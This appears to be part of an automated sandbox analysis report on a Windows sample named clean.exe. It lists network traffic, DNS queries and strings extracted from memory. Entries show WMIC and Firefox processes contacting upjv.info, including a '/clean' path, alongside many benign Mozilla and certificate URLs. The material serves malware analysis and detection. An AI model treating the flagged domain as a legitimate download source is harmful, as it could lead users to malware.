Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000011.00000003.2335055788.000002435C9F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335110994.000002435C97F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335483499.000002435C92B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418641540.0000024368481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ^application\/(?:.+\+)?json$PWMGR_LOGIN_LAST_USED_DAYSremoveAllUserFacingLoginsRemoving all user facing logins.weave:telemetry:histogrambound onEnabledPrefChangedevtools.jsonview.enabledoptInToExperiment/branch<PWMGR_BLOCKLIST_NUM_SITESPWMGR_NUM_SAVED_PASSWORDSgetAllLoginsWithCallback/<Couldn't decrypt strings: potentiallyVulnerablePasswordhttps://www.facebook.com/https://www.leboncoin.fr/https://www.amazon.co.uk/https://www.wikipedia.org/isPotentiallyVulnerablePasswordDEFAULT_REPLACEMENT_CHARACTERhttps://www.aliexpress.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2335055788.000002435C9F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335110994.000002435C97F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335483499.000002435C92B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418641540.0000024368481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3338371718.00000184C7203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000002.3338371718.00000184C7203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000016.00000002.3338371718.00000184C7203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2492956295.000002435E45B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2332689238.000002435E45B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000011.00000003.2492956295.000002435E45B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2332689238.000002435E45B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: upjv.info
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 21 Oct 2024 09:39:30 GMTcontent-type: text/html; charset=iso-8859-1x-iplb-request-id: 90D90203:BB96_D5BA2111:0050_67162152_5BDF7:52D1Content-Encoding: gzipAge: 0X-CDN-Cache: MISSX-CDN-Request-ID: 1065748001X-CDN-Pop: bhsTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 30 30 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 00adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
Source: firefox.exe, 00000011.00000003.2421599733.000002435EDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2491259190.000002435EDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: firefox.exe, 00000011.00000003.2320326095.000002435C179000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2494367583.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000011.00000003.2320326095.000002435C179000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2494367583.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000011.00000003.2320326095.000002435C179000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2494367583.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000011.00000003.2320326095.000002435C179000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2494367583.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000011.00000003.2500835652.00000243577D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 00000011.00000003.2500835652.00000243577D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000011.00000003.2500835652.00000243577D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000011.00000003.2495210278.000002435E217000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000011.00000003.2495626539.000002435E0AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000011.00000003.2483973719.000002436370D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2307680554.0000024368997000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000011.00000003.2483973719.000002436370D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000011.00000003.2445488547.00000243650FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2482098631.00000243650FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com8
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerUseOfReleaseEventsWarningUse
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://haysoft.org
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d
Source: firefox.exe, 00000011.00000003.2346734789.000002435DFD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2373792131.000002435DFD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2409329670.000002435DFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2383825415.000002435DFDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2339804933.000002435DFE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2391112437.000002435DFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2354051488.000002435DFD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2350875567.000002435DFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2356559312.000002435DFD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000011.00000003.2410189879.0000024358FF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2388339352.000002435C7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435EDD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2264776497.000002435C7DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421007107.000002435EFBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435ED9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2434614485.000002435C7F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2378953131.000002435BADC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2401229475.00000243658DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2263792179.0000024358FFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2381604409.000002435E1F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2443287304.000002435C75F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2449633960.000002435DB70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335780358.00000243658DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2330894955.000002435EF84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2467948860.000002435C8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2364433241.000002435C7F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2372566734.000002435C7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2348291029.000002435EF73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477297833.0000024368958000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2356697139.000002435C7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: clean.exe, 00000005.00000003.2156488353.0000000004240000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 7-ZipPortable.exe.5.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000011.00000003.2500835652.00000243577D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://ocsp.thawte.com0
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://portableapps.com/development.
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://softfurlan.altervista.org
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp, it.txt.5.dr String found in binary or memory: http://tjl73.altervista.org/
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: WMIC.exe, 0000000B.00000003.2222855195.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224959404.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.inf
Source: firefox.exe, 00000011.00000003.2329912010.000002436336A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347995544.00000243681FC000.00000004.00000800.00020000.00000000.sdmp, places.sqlite-wal.17.dr String found in binary or memory: http://upjv.info
Source: firefox.exe, 00000011.00000003.2485281755.000002435EF27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347995544.00000243681FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/
Source: firefox.exe, 00000011.00000003.2329837515.0000024368108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/?resource=upjv.info
Source: firefox.exe, 00000011.00000003.2470762903.00000243684CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean
Source: WMIC.exe, 0000000B.00000003.2223024451.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000003.2223569597.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224864903.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clea
